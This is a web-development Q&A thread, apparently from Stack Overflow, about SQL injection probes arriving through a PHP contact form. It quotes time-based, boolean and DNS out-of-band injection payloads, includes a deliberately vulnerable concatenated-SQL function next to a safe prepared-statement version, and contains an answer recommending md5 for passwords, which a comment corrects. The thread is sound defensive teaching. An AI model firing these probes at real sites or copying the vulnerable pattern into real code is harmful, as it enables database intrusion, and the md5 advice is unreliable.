
I'm a newbie in PHP development. I created a site using PHP, HTML & CSS which has a contact us page. For the last couple of days someone from a particular country (I don't want to mention the country name) has been creating support messages and entering some unusual or suspicious text.

The contact form has four fields: Full Name, E-mail, Subject & Message. Someone is sending messages like:

1st:
written as "Subject" & (select(0)from(select(sleep(6)))v)/*'+ 
(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

2nd:
-1' OR 2+582-582-1=0+0+0+1 or '0gX9xp3t'='

3rd:
1iY5zL4R'));select pg_sleep(3); --

4th:
1||UTL_INADDR.get_host_address('dns.'||'sqli.032682.7775.77.a4f00.1.bxss'||'.me')

And there are many more. Could anyone familiar with PHP or other web development please tell me what is going on? Also please share some security precautions I should take to prevent any threats or hacking.

I have built my site using MySQLi to prevent/minimize SQL injection threats.

Syed Naveed
  • Someone is trying to hack your site via SQL injection. If you are using prepared statements for queries you have no worries. – Jay Blanchard Mar 20 '18 at 14:05
  • Yes, I'm using prepared statements, for example $db->prepare, $db->param, etc. "$db" is my database connection variable. Everything is working fine and there has been no harm so far, but I'm afraid. – Syed Naveed Mar 20 '18 at 14:08
  • @CD001 how did you guess that? – Syed Naveed Mar 20 '18 at 14:10
  • But I don't understand how one can insert up to 80 records in under 10 seconds. My site is flooded with this number of support messages. – Syed Naveed Mar 20 '18 at 14:12
  • @user2945468 - it's a bot/script automatically spamming your form; a pretty common form of attack. Might be worth looking at something like [Google Invisible reCAPTCHA](https://www.google.com/recaptcha/intro/invisible.html) – CD001 Mar 20 '18 at 14:14
  • Surely a script they are running. Check this video if you're not sure how this works: https://www.youtube.com/watch?v=ciNHn38EyRc – Jacob H Mar 20 '18 at 14:14
  • Add some input validation and sanitization to your form inputs; that will limit the 'garbage'/'naughtiness' you are receiving – lovelace Mar 20 '18 at 14:16
  • Okay, I'm very thankful to you guys. God bless!!! – Syed Naveed Mar 20 '18 at 14:45
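The four strings in the question are automated SQL injection probes, not messages meant to be read. The first is a MySQL time-based test: if any part of it is ever evaluated as SQL, `sleep(6)` delays the response by about six seconds, which tells the attacker's tool an injection exists even when the page shows no query output. The second is a boolean test whose arithmetic (`2+582-582-1` on one side, `0+0+0+1` on the other) is built to evaluate true. The third targets PostgreSQL (`pg_sleep(3)`) and the fourth targets Oracle: `UTL_INADDR.get_host_address` forces the database server to resolve an attacker-controlled hostname, so the result leaks out of band via DNS. The same tool fires each probe in turn, which is why dozens of rows arrive within seconds. The following is an added example, not code from the question, showing the difference the comments describe: a concatenated INSERT that the first probe would actually trigger, beside the mysqli prepared statement that stores the same text as inert data, plus the server-side validation the comments suggest. The table name `support_messages`, the column names and the `$db` mysqli connection are assumptions.

```php
<?php
// Added example, not the original poster's code. Assumes a MySQL table
// support_messages(full_name, email, subject, message) and a $db mysqli
// connection opened with mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT).
declare(strict_types=1);

// The first probe quoted in the question (line wrap removed). Inside a
// single-quoted SQL literal the /*' closes the literal, the middle
// (select(0)from(select(sleep(6)))v) is evaluated, and the final '...*/'
// re-opens a literal, so the statement stays syntactically valid and
// sleep(6) runs. In a double-quoted or numeric context the other parts do the same job.
const PROBE = '(select(0)from(select(sleep(6)))v)/*\'+(select(0)from(select(sleep(6)))v)+\'"+(select(0)from(select(sleep(6)))v)+"*/';

// VULNERABLE: the values are pasted into the SQL text, so the quotes and
// comment markers in PROBE break out of the literal and sleep(6) executes.
function saveMessageVulnerable(mysqli $db, string $name, string $email, string $subject, string $message): bool
{
    $sql = "INSERT INTO support_messages (full_name, email, subject, message)
            VALUES ('$name', '$email', '$subject', '$message')";
    return $db->query($sql) === true;
}

// SAFE: prepared statement with bound parameters. The SQL text reaches the
// server first; the four values travel separately and can only be data, so
// PROBE is stored verbatim as a string and no sleep() is ever evaluated.
function saveMessageSafe(mysqli $db, string $name, string $email, string $subject, string $message): bool
{
    $stmt = $db->prepare(
        'INSERT INTO support_messages (full_name, email, subject, message) VALUES (?, ?, ?, ?)'
    );
    $stmt->bind_param('ssss', $name, $email, $subject, $message);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Server-side validation, as the comments suggest: reject input that cannot
// be a real enquiry before it reaches the database. This reduces the junk a
// bot can store; it is not a substitute for the prepared statement above.
function validateContactForm(array $post): array
{
    $errors  = [];
    $name    = trim((string) ($post['full_name'] ?? ''));
    $email   = trim((string) ($post['email'] ?? ''));
    $subject = trim((string) ($post['subject'] ?? ''));
    $message = trim((string) ($post['message'] ?? ''));

    if ($name === '' || mb_strlen($name) > 100) {
        $errors[] = 'name must be 1-100 characters';
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'invalid e-mail address';
    }
    if ($subject === '' || mb_strlen($subject) > 200) {
        $errors[] = 'subject must be 1-200 characters';
    }
    if ($message === '' || mb_strlen($message) > 5000) {
        $errors[] = 'message must be 1-5000 characters';
    }
    return $errors;
}

// Usage in the form handler (assumes $db = new mysqli(...) is already open):
// $errors = validateContactForm($_POST);
// if ($errors === []) {
//     saveMessageSafe($db, $_POST['full_name'], $_POST['email'], $_POST['subject'], $_POST['message']);
// }
// With saveMessageSafe(), a row whose message is PROBE is inserted instantly and
// reads back as the literal probe text; with saveMessageVulnerable() the same
// call would stall for roughly six seconds, which is exactly what the bot is measuring.
```

The `mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT)` setting matters for the safe path: with it, a failed `prepare()` throws instead of returning `false`, so the code never silently falls back to calling methods on a non-object.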

1 Answer


A few methods you can take to make your form safe are:

  1. Use htmlspecialchars() to prevent XSS attacks.
  2. Encrypt passwords and other personal information via md5() or other methods.
  3. Use POST method instead of GET for transferring confidential information.
  4. Do not transfer confidential data through URL.
  5. Use certain tools to prevent spambot attacks.
  6. If possible, add recaptcha.

For more tips, kindly check out https://www.thoughtco.com/solutions-to-protect-web-forms-from-spam-3467469.

PS: I am also new to PHP, just sharing my thoughts! I trust it is helpful.

Mr. Programmer
  • Apart from being largely irrelevant to the question, your second point is very badly wrong. MD5 is definitely not a suitable function for hashing passwords, and if you're using it anywhere, you should make replacing it a high priority. Instead, you should use password_hash to generate a strong, uniquely-salted hash, and then retrieve it and check with password_verify when the user tries to login. See https://php.net/password – IMSoP Jul 11 '21 at 08:30
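As an added example (not the answerer's code), here are points 1 and 2 of the list above as a practitioner would actually write them, with point 2 following the correction in the comment: stored values are escaped with `htmlspecialchars()` at the moment they are placed into HTML, not before storage, and passwords are hashed with `password_hash()` and checked with `password_verify()` rather than `md5()`. The `h()` and `renderMessageRow()` helpers, the column names and the sample row are constructed for this example and are assumptions.

```php
<?php
// Added example, not the answerer's code. Demonstrates output escaping for the
// stored support messages and password_hash()/password_verify() in place of md5().
declare(strict_types=1);

// Point 1 done right: escape on OUTPUT. ENT_QUOTES escapes both ' and " so the
// value is also safe inside attribute values; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string; the explicit charset avoids
// encoding confusion between the database and the page.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Render one stored message for an admin page. Storing the attacker's raw text
// is fine; it is echoing it unescaped into HTML that would create stored XSS.
function renderMessageRow(array $row): string
{
    return '<tr>'
        . '<td>' . h($row['full_name']) . '</td>'
        . '<td><a href="mailto:' . h($row['email']) . '">' . h($row['email']) . '</a></td>'
        . '<td>' . h($row['subject']) . '</td>'
        . '<td>' . nl2br(h($row['message'])) . '</td>'
        . '</tr>';
}

// Point 2, corrected per the comment: never store md5($password). password_hash()
// uses a slow, per-user-salted algorithm (bcrypt with PASSWORD_DEFAULT) and
// embeds algorithm, cost and salt in the returned string.
function hashPassword(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

// On login, password_verify() reads algorithm and salt from the stored hash and
// compares in constant time. If password_needs_rehash() reports true (e.g. the
// default cost was raised), re-hash and store the new value after a successful login.
function checkPassword(string $password, string $storedHash): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    if (password_needs_rehash($storedHash, PASSWORD_DEFAULT)) {
        // Caller should persist hashPassword($password) here; omitted in this example.
    }
    return true;
}

// Constructed sample row carrying XSS probes instead of the SQL probes from the question.
$sample = [
    'full_name' => 'Test <script>alert(1)</script>',
    'email'     => 'x@example.com" onmouseover="alert(1)',
    'subject'   => "It's a test",
    'message'   => "line 1\nline 2",
];
// Both the <script> tag and the injected attribute are emitted as harmless literal text.
echo renderMessageRow($sample), PHP_EOL;

$hash = hashPassword('correct horse battery staple');
var_dump(checkPassword('correct horse battery staple', $hash));
var_dump(checkPassword('wrong password', $hash));
```

Escaping at output rather than at input is deliberate: the same stored value may later be placed in HTML, in JSON, or in an e-mail, and each of those needs a different encoding, so the database should hold the original text and the rendering layer should do the escaping.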